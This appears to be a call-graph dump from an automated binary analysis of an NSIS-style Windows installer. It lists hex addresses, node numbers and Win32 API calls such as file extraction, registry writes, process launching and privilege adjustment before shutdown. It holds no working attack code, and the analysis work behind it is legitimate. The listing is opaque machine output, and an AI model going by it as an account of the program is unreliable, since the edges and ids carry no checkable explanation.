40588f 3525->3527 3570 4044d5 SendMessageW 3526->3570 3529 4058c0 3527->3529 3530 405898 GetDlgItem CreateThread FindCloseChangeNotification 3527->3530 3532 4058eb 3529->3532 3533 405910 3529->3533 3534 4058d7 ShowWindow ShowWindow 3529->3534 3530->3529 3573 405679 OleInitialize 3530->3573 3531 405776 3537 40577d GetClientRect GetSystemMetrics SendMessageW SendMessageW 3531->3537 3535 40594b 3532->3535 3539 405925 ShowWindow 3532->3539 3540 4058ff 3532->3540 3536 404507 8 API calls 3533->3536 3572 4044d5 SendMessageW 3534->3572 3535->3533 3545 405959 SendMessageW 3535->3545 3552 40591e 3536->3552 3543 4057eb 3537->3543 3544 4057cf SendMessageW SendMessageW 3537->3544 3541 405945 3539->3541 3542 405937 3539->3542 3546 404479 SendMessageW 3540->3546 3548 404479 SendMessageW 3541->3548 3547 4055a6 28 API calls 3542->3547 3549 4057f0 SendMessageW 3543->3549 3550 4057fe 3543->3550 3544->3543 3551 405972 CreatePopupMenu 3545->3551 3545->3552 3546->3533 3547->3541 3548->3535 3549->3550 3554 4044a0 22 API calls 3550->3554 3553 40655e 21 API calls 3551->3553 3555 405982 AppendMenuW 3553->3555 3556 40580e 3554->3556 3557 4059b2 TrackPopupMenu 3555->3557 3558 40599f GetWindowRect 3555->3558 3559 405817 ShowWindow 3556->3559 3560 40584b GetDlgItem SendMessageW 3556->3560 3557->3552 3562 4059cd 3557->3562 3558->3557 3563 40583a 3559->3563 3564 40582d ShowWindow 3559->3564 3560->3552 3561 405872 SendMessageW SendMessageW 3560->3561 3561->3552 3565 4059e9 SendMessageW 3562->3565 3571 4044d5 SendMessageW 3563->3571 3564->3563 3565->3565 3566 405a06 OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3565->3566 3568 405a2b SendMessageW 3566->3568 3568->3568 3569 405a54 GlobalUnlock SetClipboardData CloseClipboard 3568->3569 3569->3552 3570->3531 3571->3560 3572->3532 3574 4044ec SendMessageW 3573->3574 3575 40569c 3574->3575 3578 401389 2 API calls 3575->3578 3579 4056c3 3575->3579 3576 4044ec SendMessageW 3577 4056d5 OleUninitialize 3576->3577 3578->3575 3579->3576 4234 404ce7 4235 404d13 4234->4235 4236 404cf7 4234->4236 4238 404d46 4235->4238 4239 404d19 SHGetPathFromIDListW 4235->4239 4245 405b65 GetDlgItemTextW 4236->4245 4241 404d29 4239->4241 4244 404d30 SendMessageW 4239->4244 4240 404d04 SendMessageW 4240->4235 4242 40140b 2 API calls 4241->4242 4242->4244 4244->4238 4245->4240 4246 401568 4247 402ba9 4246->4247 4250 406468 wsprintfW 4247->4250 4249 402bae 4250->4249 4251 40196d 4252 402d89 21 API calls 4251->4252 4253 401974 4252->4253 4254 402d89 21 API calls 4253->4254 4255 401981 4254->4255 4256 402dab 21 API calls 4255->4256 4257 401998 lstrlenW 4256->4257 4258 4019a9 4257->4258 4259 4019ea 4258->4259 4263 406521 lstrcpynW 4258->4263 4261 4019da 4261->4259 4262 4019df lstrlenW 4261->4262 4262->4259 4263->4261 4264 40166f 4265 402dab 21 API calls 4264->4265 4266 401675 4265->4266 4267 40687e 2 API calls 4266->4267 4268 40167b 4267->4268 4269 402af0 4270 402d89 21 API calls 4269->4270 4271 402af6 4270->4271 4272 40655e 21 API calls 4271->4272 4273 402933 4271->4273 4272->4273 4274 4026f1 4275 402d89 21 API calls 4274->4275 4283 402700 4275->4283 4276 40283d 4277 40274a ReadFile 4277->4276 4277->4283 4278 406094 ReadFile 4278->4283 4279 40278a MultiByteToWideChar 4279->4283 4280 40283f 4287 406468 wsprintfW 4280->4287 4281 4060f2 5 API calls 4281->4283 4283->4276 4283->4277 4283->4278 4283->4279 4283->4280 4283->4281 4284 4027b0 SetFilePointer MultiByteToWideChar 4283->4284 4285 402850 4283->4285 4284->4283 4285->4276 4286 402871 SetFilePointer 4285->4286 4286->4276 4287->4276 3428 401774 3429 402dab 21 API calls 3428->3429 3430 40177b 3429->3430 3431 4017a3 3430->3431 3432 40179b 3430->3432 3503 406521 lstrcpynW 3431->3503 3502 406521 lstrcpynW 3432->3502 3435 4017a1 3439 4067cf 5 API calls 3435->3439 3436 4017ae 3504 405df0 lstrlenW CharPrevW 3436->3504 3455 4017c0 3439->3455 3443 4017d2 CompareFileTime 3443->3455 3444 401892 3470 4055a6 3444->3470 3445 401869 3447 4055a6 28 API calls 3445->3447 3457 40187e 3445->3457 3447->3457 3451 406521 lstrcpynW 3451->3455 3452 4018c3 SetFileTime 3453 4018d5 FindCloseChangeNotification 3452->3453 3456 4018e6 3453->3456 3453->3457 3454 40655e 21 API calls 3454->3455 3455->3443 3455->3444 3455->3445 3455->3451 3455->3454 3462 405b81 MessageBoxIndirectW 3455->3462 3466 405fec GetFileAttributesW 3455->3466 3469 406011 GetFileAttributesW CreateFileW 3455->3469 3507 40687e FindFirstFileW 3455->3507 3458 4018eb 3456->3458 3459 4018fe 3456->3459 3460 40655e 21 API calls 3458->3460 3461 40655e 21 API calls 3459->3461 3463 4018f3 lstrcatW 3460->3463 3464 401906 3461->3464 3462->3455 3463->3464 3465 405b81 MessageBoxIndirectW 3464->3465 3465->3457 3467 40600b 3466->3467 3468 405ffe SetFileAttributesW 3466->3468 3467->3455 3468->3467 3469->3455 3471 4055c1 3470->3471 3479 40189c 3470->3479 3472 4055dd lstrlenW 3471->3472 3473 40655e 21 API calls 3471->3473 3474 405606 3472->3474 3475 4055eb lstrlenW 3472->3475 3473->3472 3477 405619 3474->3477 3478 40560c SetWindowTextW 3474->3478 3476 4055fd lstrcatW 3475->3476 3475->3479 3476->3474 3477->3479 3480 40561f SendMessageW SendMessageW SendMessageW 3477->3480 3478->3477 3481 4032b9 3479->3481 3480->3479 3483 4032d2 3481->3483 3482 4032fd 3510 40349e 3482->3510 3483->3482 3522 4034b4 SetFilePointer 3483->3522 3487 4018af 3487->3452 3487->3453 3488 40331a GetTickCount 3497 40332d 3488->3497 3489 40343e 3490 403442 3489->3490 3494 40345a 3489->3494 3491 40349e ReadFile 3490->3491 3491->3487 3492 40349e ReadFile 3492->3494 3493 40349e ReadFile 3493->3497 3494->3487 3494->3492 3495 4060c3 WriteFile 3494->3495 3495->3494 3497->3487 3497->3493 3498 403393 GetTickCount 3497->3498 3499 4033bc MulDiv wsprintfW 3497->3499 3513 406a90 3497->3513 3520 4060c3 WriteFile 3497->3520 3498->3497 3500 4055a6 28 API calls 3499->3500 3500->3497 3502->3435 3503->3436 3505 4017b4 lstrcatW 3504->3505 3506 405e0c lstrcatW 3504->3506 3505->3435 3506->3505 3508 406894 FindClose 3507->3508 3509 40689f 3507->3509 3508->3509 3509->3455 3523 406094 ReadFile 3510->3523 3514 406ab5 3513->3514 3519 406abd 3513->3519 3514->3497 3515 406b44 GlobalFree 3516 406b4d GlobalAlloc 3515->3516 3516->3514 3516->3519 3517 406bc4 GlobalAlloc 3517->3514 3517->3519 3518 406bbb GlobalFree 3518->3517 3519->3514 3519->3515 3519->3516 3519->3517 3519->3518 3521 4060e1 3520->3521 3521->3497 3522->3482 3524 403308 3523->3524 3524->3487 3524->3488 3524->3489 4302 4014f5 SetForegroundWindow 4303 402c2f 4302->4303 4304 401a77 4305 402d89 21 API calls 4304->4305 4306 401a80 4305->4306 4307 402d89 21 API calls 4306->4307 4308 401a25 4307->4308 4309 401578 4310 401591 4309->4310 4311 401588 ShowWindow 4309->4311 4312 402c2f 4310->4312 4313 40159f ShowWindow 4310->4313 4311->4310 4313->4312 4314 4023f9 4315 402dab 21 API calls 4314->4315 4316 402408 4315->4316 4317 402dab 21 API calls 4316->4317 4318 402411 4317->4318 4319 402dab 21 API calls 4318->4319 4320 40241b GetPrivateProfileStringW 4319->4320 4321 401ffb 4322 402dab 21 API calls 4321->4322 4323 402002 4322->4323 4324 40687e 2 API calls 4323->4324 4325 402008 4324->4325 4327 402019 4325->4327 4328 406468 wsprintfW 4325->4328 4328->4327 3760 4034fc SetErrorMode GetVersionExW 3761 403550 GetVersionExW 3760->3761 3762 403588 3760->3762 3761->3762 3763 4035df 3762->3763 3764 406915 5 API calls 3762->3764 3765 4068a5 3 API calls 3763->3765 3764->3763 3766 4035f5 lstrlenA 3765->3766 3766->3763 3767 403605 3766->3767 3768 406915 5 API calls 3767->3768 3769 40360c 3768->3769 3770 406915 5 API calls 3769->3770 3771 403613 3770->3771 3772 406915 5 API calls 3771->3772 3773 40361f #17 OleInitialize SHGetFileInfoW 3772->3773 3848 406521 lstrcpynW 3773->3848 3776 40366e GetCommandLineW 3849 406521 lstrcpynW 3776->3849 3778 403680 3779 405e1d CharNextW 3778->3779 3780 4036a6 CharNextW 3779->3780 3788 4036b8 3780->3788 3781 4037ba 3782 4037ce GetTempPathW 3781->3782 3850 4034cb 3782->3850 3784 4037e6 3785 403840 DeleteFileW 3784->3785 3786 4037ea GetWindowsDirectoryW lstrcatW 3784->3786 3860 403082 GetTickCount GetModuleFileNameW 3785->3860 3789 4034cb 12 API calls 3786->3789 3787 405e1d CharNextW 3787->3788 3788->3781 3788->3787 3794 4037bc 3788->3794 3791 403806 3789->3791 3791->3785 3793 40380a GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3791->3793 3792 403854 3795 403a47 ExitProcess OleUninitialize 3792->3795 3804 405e1d CharNextW 3792->3804 3831 4038fb 3792->3831 3797 4034cb 12 API calls 3793->3797 3944 406521 lstrcpynW 3794->3944 3798 403a59 3795->3798 3799 403a7d 3795->3799 3802 403838 3797->3802 3803 405b81 MessageBoxIndirectW 3798->3803 3800 403a85 GetCurrentProcess OpenProcessToken 3799->3800 3808 403b01 ExitProcess 3799->3808 3805 403ad1 3800->3805 3806 403a9d LookupPrivilegeValueW AdjustTokenPrivileges 3800->3806 3802->3785 3802->3795 3810 403a67 ExitProcess 3803->3810 3815 403873 3804->3815 3811 406915 5 API calls 3805->3811 3806->3805 3807 40390b 3807->3795 3812 403ad8 3811->3812 3817 403aed ExitWindowsEx 3812->3817 3820 403afa 3812->3820 3813 4038d1 3818 405ef8 18 API calls 3813->3818 3814 403914 3816 405aec 5 API calls 3814->3816 3815->3813 3815->3814 3819 403919 lstrlenW 3816->3819 3817->3808 3817->3820 3821 4038dd 3818->3821 3947 406521 lstrcpynW 3819->3947 3823 40140b 2 API calls 3820->3823 3821->3795 3945 406521 lstrcpynW 3821->3945 3823->3808 3824 403933 3826 40393c 3824->3826 3845 40394b 3824->3845 3948 406521 lstrcpynW 3826->3948 3827 4038f0 3946 406521 lstrcpynW 3827->3946 3830 403971 wsprintfW 3832 40655e 21 API calls 3830->3832 3888 403bf3 3831->3888 3832->3845 3833 405acf 2 API calls 3833->3845 3834 405a75 2 API calls 3834->3845 3835 4039e7 SetCurrentDirectoryW 3838 4062e1 40 API calls 3835->3838 3836 4039ad GetFileAttributesW 3837 4039b9 DeleteFileW 3836->3837 3836->3845 3837->3845 3840 4039f6 CopyFileW 3838->3840 3839 4039e5 3839->3795 3840->3839 3840->3845 3841 405c2d 71 API calls 3841->3845 3842 4062e1 40 API calls 3842->3845 3843 40655e 21 API calls 3843->3845 3845->3830 3845->3833 3845->3834 3845->3835 3845->3836 3845->3839 3845->3841 3845->3842 3845->3843 3846 403a6f CloseHandle 3845->3846 3847 40687e 2 API calls 3845->3847 3949 405b04 CreateProcessW 3845->3949 3846->3839 3847->3845 3848->3776 3849->3778 3851 4067cf 5 API calls 3850->3851 3852 4034d7 3851->3852 3853 4034e1 3852->3853 3854 405df0 3 API calls 3852->3854 3853->3784 3855 4034e9 3854->3855 3856 405acf 2 API calls 3855->3856 3857 4034ef 3856->3857 3858 406040 2 API calls 3857->3858 3859 4034fa 3858->3859 3859->3784 3952 406011 GetFileAttributesW CreateFileW 3860->3952 3862 4030c2 3880 4030d2 3862->3880 3953 406521 lstrcpynW 3862->3953 3864 4030e8 3865 405e3c 2 API calls 3864->3865 3866 4030ee 3865->3866 3954 406521 lstrcpynW 3866->3954 3868 4030f9 GetFileSize 3869 4031f3 3868->3869 3882 403110 3868->3882 3955 40301e 3869->3955 3871 4031fc 3873 40322c GlobalAlloc 3871->3873 3871->3880 3967 4034b4 SetFilePointer 3871->3967 3872 40349e ReadFile 3872->3882 3966 4034b4 SetFilePointer 3873->3966 3875 40325f 3877 40301e 6 API calls 3875->3877 3877->3880 3878 403215 3881 40349e ReadFile 3878->3881 3879 403247 3883 4032b9 39 API calls 3879->3883 3880->3792 3884 403220 3881->3884 3882->3869 3882->3872 3882->3875 3882->3880 3885 40301e 6 API calls 3882->3885 3886 403253 3883->3886 3884->3873 3884->3880 3885->3882 3886->3880 3886->3886 3887 403290 SetFilePointer 3886->3887 3887->3880 3889 406915 5 API calls 3888->3889 3890 403c07 3889->3890 3891 403c0d GetUserDefaultUILanguage 3890->3891 3892 403c1f 3890->3892 3968 406468 wsprintfW 3891->3968 3894 4063ef 3 API calls 3892->3894 3896 403c4f 3894->3896 3895 403c1d 3969 403ec9 3895->3969 3897 403c6e lstrcatW 3896->3897 3899 4063ef 3 API calls 3896->3899 3897->3895 3899->3897 3901 405ef8 18 API calls 3902 403ca0 3901->3902 3903 403d34 3902->3903 3905 4063ef 3 API calls 3902->3905 3904 405ef8 18 API calls 3903->3904 3906 403d3a 3904->3906 3907 403cd2 3905->3907 3908 403d4a LoadImageW 3906->3908 3909 40655e 21 API calls 3906->3909 3907->3903 3912 403cf3 lstrlenW 3907->3912 3917 405e1d CharNextW 3907->3917 3910 403df0 3908->3910 3911 403d71 RegisterClassW 3908->3911 3909->3908 3915 40140b 2 API calls 3910->3915 3913 403da7 SystemParametersInfoW CreateWindowExW 3911->3913 3914 403dfa 3911->3914 3918 403d01 lstrcmpiW 3912->3918 3919 403d27 3912->3919 3913->3910 3914->3807 3916 403df6 3915->3916 3916->3914 3923 403ec9 22 API calls 3916->3923 3921 403cf0 3917->3921 3918->3919 3922 403d11 GetFileAttributesW 3918->3922 3920 405df0 3 API calls 3919->3920 3924 403d2d 3920->3924 3921->3912 3925 403d1d 3922->3925 3927 403e07 3923->3927 3977 406521 lstrcpynW 3924->3977 3925->3919 3926 405e3c 2 API calls 3925->3926 3926->3919 3929 403e13 ShowWindow 3927->3929 3930 403e96 3927->3930 3932 4068a5 3 API calls 3929->3932 3931 405679 5 API calls 3930->3931 3933 403e9c 3931->3933 3934 403e2b 3932->3934 3935 403ea0 3933->3935 3936 403eb8 3933->3936 3937 403e39 GetClassInfoW 3934->3937 3939 4068a5 3 API calls 3934->3939 3935->3914 3942 40140b 2 API calls 3935->3942 3938 40140b 2 API calls 3936->3938 3940 403e63 DialogBoxParamW 3937->3940 3941 403e4d GetClassInfoW RegisterClassW 3937->3941 3938->3914 3939->3937 3943 40140b 2 API calls 3940->3943 3941->3940 3942->3914 3943->3914 3944->3782 3945->3827 3946->3831 3947->3824 3948->3845 3950 405b43 3949->3950 3951 405b37 CloseHandle 3949->3951 3950->3845 3951->3950 3952->3862 3953->3864 3954->3868 3956 403027 3955->3956 3957 40303f 3955->3957 3958 403030 DestroyWindow 3956->3958 3959 403037 3956->3959 3960 403047 3957->3960 3961 40304f GetTickCount 3957->3961 3958->3959 3959->3871 3962 406951 2 API calls 3960->3962 3963 403080 3961->3963 3964 40305d CreateDialogParamW ShowWindow 3961->3964 3965 40304d 3962->3965 3963->3871 3964->3963 3965->3871 3966->3879 3967->3878 3968->3895 3970 403edd 3969->3970 3978 406468 wsprintfW 3970->3978 3972 403f4e 3973 403f82 22 API calls 3972->3973 3975 403f53 3973->3975 3974 403c7e 3974->3901 3975->3974 3976 40655e 21 API calls 3975->3976 3976->3975 3977->3903 3978->3972 4329 401b7c 4330 402dab 21 API calls 4329->4330 4331 401b83 4330->4331 4332 402d89 21 API calls 4331->4332 4333 401b8c wsprintfW 4332->4333 4334 402c2f 4333->4334 4342 401000 4343 401037 BeginPaint GetClientRect 4342->4343 4344 40100c DefWindowProcW 4342->4344 4346 4010f3 4343->4346 4349 401179 4344->4349 4347 401073 CreateBrushIndirect FillRect DeleteObject 4346->4347 4348 4010fc 4346->4348 4347->4346 4350 401102 CreateFontIndirectW 4348->4350 4351 401167 EndPaint 4348->4351 4350->4351 4352 401112 6 API calls 4350->4352 4351->4349 4352->4351 4353 401680 4354 402dab 21 API calls 4353->4354 4355 401687 4354->4355 4356 402dab 21 API calls 4355->4356 4357 401690 4356->4357 4358 402dab 21 API calls 4357->4358 4359 401699 MoveFileW 4358->4359 4360 4016ac 4359->4360 4366 4016a5 4359->4366 4362 4022fb 4360->4362 4363 40687e 2 API calls 4360->4363 4361 401423 28 API calls 4361->4362 4364 4016bb 4363->4364 4364->4362 4365 4062e1 40 API calls 4364->4365 4365->4366 4366->4361 4367 401503 4368 401520 4367->4368 4369 401508 4367->4369 4370 402d89 21 API calls 4369->4370 4370->4368 4371 401a04 4372 402dab 21 API calls 4371->4372 4373 401a0b 4372->4373 4374 402dab 21 API calls 4373->4374 4375 401a14 4374->4375 4376 401a1b lstrcmpiW 4375->4376 4377 401a2d lstrcmpW 4375->4377 4378 401a21 4376->4378 4377->4378 4379 402304 4380 402dab 21 API calls 4379->4380 4381 40230a 4380->4381 4382 402dab 21 API calls 4381->4382 4383 402313 4382->4383 4384 402dab 21 API calls 4383->4384 4385 40231c 4384->4385 4386 40687e 2 API calls 4385->4386 4387 402325 4386->4387 4388 402336 lstrlenW lstrlenW 4387->4388 4389 402329 4387->4389 4390 4055a6 28 API calls 4388->4390 4391 4055a6 28 API calls 4389->4391 4393 402331 4389->4393 4392 402374 SHFileOperationW 4390->4392 4391->4393 4392->4389 4392->4393 4394 401d86 4395 401d99 GetDlgItem 4394->4395 4396 401d8c 4394->4396 4398 401d93 4395->4398 4397 402d89 21 API calls 4396->4397 4397->4398 4399 401dda GetClientRect LoadImageW SendMessageW 4398->4399 4401 402dab 21 API calls 4398->4401 4402 401e38 4399->4402 4404 401e44 4399->4404 4401->4399 4403 401e3d DeleteObject 4402->4403 4402->4404 4403->4404 4405 402388 4406 40238f 4405->4406 4409 4023a2 4405->4409 4407 40655e 21 API calls 4406->4407 4408 40239c 4407->4408 4410 405b81 MessageBoxIndirectW 4408->4410 4410->4409 4411 402c0a SendMessageW 4412 402c24 InvalidateRect 4411->4412 4413 402c2f 4411->4413 4412->4413 4421 404f0d GetDlgItem GetDlgItem 4422 404f5f 7 API calls 4421->4422 4434 405184 4421->4434 4423 405006 DeleteObject 4422->4423 4424 404ff9 SendMessageW 4422->4424 4425 40500f 4423->4425 4424->4423 4426 405046 4425->4426 4430 40655e 21 API calls 4425->4430 4427 4044a0 22 API calls 4426->4427 4431 40505a 4427->4431 4428 405312 4432 405324 4428->4432 4433 40531c SendMessageW 4428->4433 4429 405266 4429->4428 4437 4052bf SendMessageW 4429->4437 4464 405177 4429->4464 4435 405028 SendMessageW SendMessageW 4430->4435 4436 4044a0 22 API calls 4431->4436 4444 405336 ImageList_Destroy 4432->4444 4445 40533d 4432->4445 4453 40534d 4432->4453 4433->4432 4434->4429 4451 4051f3 4434->4451 4475 404e5b SendMessageW 4434->4475 4435->4425 4452 40506b 4436->4452 4442 4052d4 SendMessageW 4437->4442 4437->4464 4438 405258 SendMessageW 4438->4429 4439 404507 8 API calls 4443 405513 4439->4443 4441 4054c7 4449 4054d9 ShowWindow GetDlgItem ShowWindow 4441->4449 4441->4464 4448 4052e7 4442->4448 4444->4445 4446 405346 GlobalFree 4445->4446 4445->4453 4446->4453 4447 405146 GetWindowLongW SetWindowLongW 4450 40515f 4447->4450 4459 4052f8 SendMessageW 4448->4459 4449->4464 4454 405164 ShowWindow 4450->4454 4455 40517c 4450->4455 4451->4429 4451->4438 4452->4447 4458 4050be SendMessageW 4452->4458 4460 405141 4452->4460 4461 405110 SendMessageW 4452->4461 4462 4050fc SendMessageW 4452->4462 4453->4441 4468 405388 4453->4468 4480 404edb 4453->4480 4473 4044d5 SendMessageW 4454->4473 4474 4044d5 SendMessageW 4455->4474 4458->4452 4459->4428 4460->4447 4460->4450 4461->4452 4462->4452 4464->4439 4465 405492 4466 40549d InvalidateRect 4465->4466 4469 4054a9 4465->4469 4466->4469 4467 4053b6 SendMessageW 4472 4053cc 4467->4472 4468->4467 4468->4472 4469->4441 4489 404e16 4469->4489 4471 405440 SendMessageW SendMessageW 4471->4472 4472->4465 4472->4471 4473->4464 4474->4434 4476 404eba SendMessageW 4475->4476 4477 404e7e GetMessagePos ScreenToClient SendMessageW 4475->4477 4478 404eb2 4476->4478 4477->4478 4479 404eb7 4477->4479 4478->4451 4479->4476 4492 406521 lstrcpynW 4480->4492 4482 404eee 4493 406468 wsprintfW 4482->4493 4484 404ef8 4485 40140b 2 API calls 4484->4485 4486 404f01 4485->4486 4494 406521 lstrcpynW 4486->4494 4488 404f08 4488->4468 4495 404d4d 4489->4495 4491 404e2b 4491->4441 4492->4482 4493->4484 4494->4488 4496 404d66 4495->4496 4497 40655e 21 API calls 4496->4497 4498 404dca 4497->4498 4499 40655e 21 API calls 4498->4499 4500 404dd5 4499->4500 4501 40655e 21 API calls 4500->4501 4502 404deb lstrlenW wsprintfW SetDlgItemTextW 4501->4502 4502->4491 4503 40248f 4504 402dab 21 API calls 4503->4504 4505 4024a1 4504->4505 4506 402dab 21 API calls 4505->4506 4507 4024ab 4506->4507 4520 402e3b 4507->4520 4510 4024e3 4512 4024ef 4510->4512 4515 402d89 21 API calls 4510->4515 4511 402dab 21 API calls 4514 4024d9 lstrlenW 4511->4514 4513 40250e RegSetValueExW 4512->4513 4516 4032b9 39 API calls 4512->4516 4517 402524 RegCloseKey 4513->4517 4514->4510 4515->4512 4516->4513 4519 402933 4517->4519 4521 402e56 4520->4521 4524 4063bc 4521->4524 4525 4063cb 4524->4525 4526 4024bb 4525->4526 4527 4063d6 RegCreateKeyExW 4525->4527 4526->4510 4526->4511 4526->4519 4527->4526 4528 404610 lstrlenW 4529 404631 WideCharToMultiByte 4528->4529 4530 40462f 4528->4530 4530->4529 4531 402910 4532 402dab 21 API calls 4531->4532 4533 402917 FindFirstFileW 4532->4533 4534 40293f 4533->4534 4537 40292a 4533->4537 4539 406468 wsprintfW 4534->4539 4536 402948 4540 406521 lstrcpynW 4536->4540 4539->4536 4540->4537 4541 401911 4542 401948 4541->4542 4543 402dab 21 API calls 4542->4543 4544 40194d 4543->4544 4545 405c2d 71 API calls 4544->4545 4546 401956 4545->4546 4547 404991 4548 4049bd 4547->4548 4549 4049ce 4547->4549 4608 405b65 GetDlgItemTextW 4548->4608 4551 4049da GetDlgItem 4549->4551 4558 404a39 4549->4558 4553 4049ee 4551->4553 4552 4049c8 4555 4067cf 5 API calls 4552->4555 4556 404a02 SetWindowTextW 4553->4556 4561 405e9b 4 API calls 4553->4561 4554 404b1d 4557 404ccc 4554->4557 4610 405b65 GetDlgItemTextW 4554->4610 4555->4549 4562 4044a0 22 API calls 4556->4562 4560 404507 8 API calls 4557->4560 4558->4554 4558->4557 4563 40655e 21 API calls 4558->4563 4565 404ce0 4560->4565 4566 4049f8 4561->4566 4567 404a1e 4562->4567 4568 404aad SHBrowseForFolderW 4563->4568 4564 404b4d 4569 405ef8 18 API calls 4564->4569 4566->4556 4575 405df0 3 API calls 4566->4575 4570 4044a0 22 API calls 4567->4570 4568->4554 4571 404ac5 CoTaskMemFree 4568->4571 4572 404b53 4569->4572 4573 404a2c 4570->4573 4574 405df0 3 API calls 4571->4574 4611 406521 lstrcpynW 4572->4611 4609 4044d5 SendMessageW 4573->4609 4577 404ad2 4574->4577 4575->4556 4580 404b09 SetDlgItemTextW 4577->4580 4584 40655e 21 API calls 4577->4584 4579 404a32 4582 406915 5 API calls 4579->4582 4580->4554 4581 404b6a 4583 406915 5 API calls 4581->4583 4582->4558 4591 404b71 4583->4591 4585 404af1 lstrcmpiW 4584->4585 4585->4580 4588 404b02 lstrcatW 4585->4588 4586 404bb2 4612 406521 lstrcpynW 4586->4612 4588->4580 4589 404bb9 4590 405e9b 4 API calls 4589->4590 4592 404bbf GetDiskFreeSpaceW 4590->4592 4591->4586 4595 405e3c 2 API calls 4591->4595 4597 404c0a 4591->4597 4594 404be3 MulDiv 4592->4594 4592->4597 4594->4597 4595->4591 4596 404c7b 4599 404c9e 4596->4599 4601 40140b 2 API calls 4596->4601 4597->4596 4598 404e16 24 API calls 4597->4598 4600 404c68 4598->4600 4613 4044c2 KiUserCallbackDispatcher 4599->4613 4602 404c7d SetDlgItemTextW 4600->4602 4603 404c6d 4600->4603 4601->4599 4602->4596 4606 404d4d 24 API calls 4603->4606 4605 404cba 4605->4557 4607 4048ea SendMessageW 4605->4607 4606->4596 4607->4557 4608->4552 4609->4579 4610->4564 4611->4581 4612->4589 4613->4605 4614 401491 4615 4055a6 28 API calls 4614->4615 4616 401498 4615->4616 4617 401914 4618 402dab 21 API calls 4617->4618 4619 40191b 4618->4619 4620 405b81 MessageBoxIndirectW 4619->4620 4621 401924 4620->4621 4622 402896 4623 40289d 4622->4623 4625 402bae 4622->4625 4624 402d89 21 API calls 4623->4624 4626 4028a4 4624->4626 4627 4028b3 SetFilePointer 4626->4627 4627->4625 4628 4028c3 4627->4628 4630 406468 wsprintfW 4628->4630 4630->4625 3619 401f17 3620 402dab 21 API calls 3619->3620 3621 401f1d 3620->3621 3622 402dab 21 API calls 3621->3622 3623 401f26 3622->3623 3624 402dab 21 API calls 3623->3624 3625 401f2f 3624->3625 3626 402dab 21 API calls 3625->3626 3627 401f38 3626->3627 3628 401423 28 API calls 3627->3628 3629 401f3f 3628->3629 3636 405b47 ShellExecuteExW 3629->3636 3631 401f87 3632 402933 3631->3632 3637 4069c0 WaitForSingleObject 3631->3637 3634 401fa4 CloseHandle 3634->3632 3636->3631 3638 4069da 3637->3638 3639 4069ec GetExitCodeProcess 3638->3639 3642 406951 3638->3642 3639->3634 3643 40696e PeekMessageW 3642->3643 3644 406964 DispatchMessageW 3643->3644 3645 40697e WaitForSingleObject 3643->3645 3644->3643 3645->3638 4631 402f98 4632 402fc3 4631->4632 4633 402faa SetTimer 4631->4633 4634 403018 4632->4634 4635 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4632->4635 4633->4632 4635->4634 3646 403b19 3647 403b31 3646->3647 3648 403b23 CloseHandle 3646->3648 3653 403b5e 3647->3653 3648->3647 3654 403b6c 3653->3654 3655 403b36 3654->3655 3656 403b71 FreeLibrary GlobalFree 3654->3656 3657 405c2d 3655->3657 3656->3655 3656->3656 3693 405ef8 3657->3693 3660 405c55 DeleteFileW 3690 403b42 3660->3690 3661 405c6c 3662 405d8c 3661->3662 3707 406521 lstrcpynW 3661->3707 3669 40687e 2 API calls 3662->3669 3662->3690 3664 405c92 3665 405ca5 3664->3665 3666 405c98 lstrcatW 3664->3666 3708 405e3c lstrlenW 3665->3708 3667 405cab 3666->3667 3670 405cbb lstrcatW 3667->3670 3672 405cc6 lstrlenW FindFirstFileW 3667->3672 3671 405db1 3669->3671 3670->3672 3673 405df0 3 API calls 3671->3673 3671->3690 3672->3662 3674 405ce8 3672->3674 3675 405dbb 3673->3675 3676 405d6f FindNextFileW 3674->3676 3686 405c2d 64 API calls 3674->3686 3688 4055a6 28 API calls 3674->3688 3691 4055a6 28 API calls 3674->3691 3712 406521 lstrcpynW 3674->3712 3713 405be5 3674->3713 3721 4062e1 MoveFileExW 3674->3721 3677 405be5 5 API calls 3675->3677 3676->3674 3680 405d85 FindClose 3676->3680 3679 405dc7 3677->3679 3681 405de1 3679->3681 3682 405dcb 3679->3682 3680->3662 3684 4055a6 28 API calls 3681->3684 3685 4055a6 28 API calls 3682->3685 3682->3690 3684->3690 3687 405dd8 3685->3687 3686->3674 3689 4062e1 40 API calls 3687->3689 3688->3676 3689->3690 3691->3674 3725 406521 lstrcpynW 3693->3725 3695 405f09 3696 405e9b 4 API calls 3695->3696 3697 405f0f 3696->3697 3698 405c4d 3697->3698 3699 4067cf 5 API calls 3697->3699 3698->3660 3698->3661 3705 405f1f 3699->3705 3700 405f50 lstrlenW 3701 405f5b 3700->3701 3700->3705 3702 405df0 3 API calls 3701->3702 3704 405f60 GetFileAttributesW 3702->3704 3703 40687e 2 API calls 3703->3705 3704->3698 3705->3698 3705->3700 3705->3703 3706 405e3c 2 API calls 3705->3706 3706->3700 3707->3664 3709 405e4a 3708->3709 3710 405e50 CharPrevW 3709->3710 3711 405e5c 3709->3711 3710->3709 3710->3711 3711->3667 3712->3674 3714 405fec 2 API calls 3713->3714 3715 405bf1 3714->3715 3716 405c00 RemoveDirectoryW 3715->3716 3717 405c08 DeleteFileW 3715->3717 3719 405c12 3715->3719 3718 405c0e 3716->3718 3717->3718 3718->3719 3720 405c1e SetFileAttributesW 3718->3720 3719->3674 3720->3719 3722 406302 3721->3722 3723 4062f5 3721->3723 3722->3674 3726 406167 3723->3726 3725->3695 3727 406197 3726->3727 3728 4061bd GetShortPathNameW 3726->3728 3753 406011 GetFileAttributesW CreateFileW 3727->3753 3730 4061d2 3728->3730 3731 4062dc 3728->3731 3730->3731 3733 4061da wsprintfA 3730->3733 3731->3722 3732 4061a1 CloseHandle GetShortPathNameW 3732->3731 3734 4061b5 3732->3734 3735 40655e 21 API calls 3733->3735 3734->3728 3734->3731 3736 406202 3735->3736 3754 406011 GetFileAttributesW CreateFileW 3736->3754 3738 40620f 3738->3731 3739 40621e GetFileSize GlobalAlloc 3738->3739 3740 406240 3739->3740 3741 4062d5 CloseHandle 3739->3741 3742 406094 ReadFile 3740->3742 3741->3731 3743 406248 3742->3743 3743->3741 3755 405f76 lstrlenA 3743->3755 3746 406273 3748 405f76 4 API calls 3746->3748 3747 40625f lstrcpyA 3749 406281 3747->3749 3748->3749 3750 4062b8 SetFilePointer 3749->3750 3751 4060c3 WriteFile 3750->3751 3752 4062ce GlobalFree 3751->3752 3752->3741 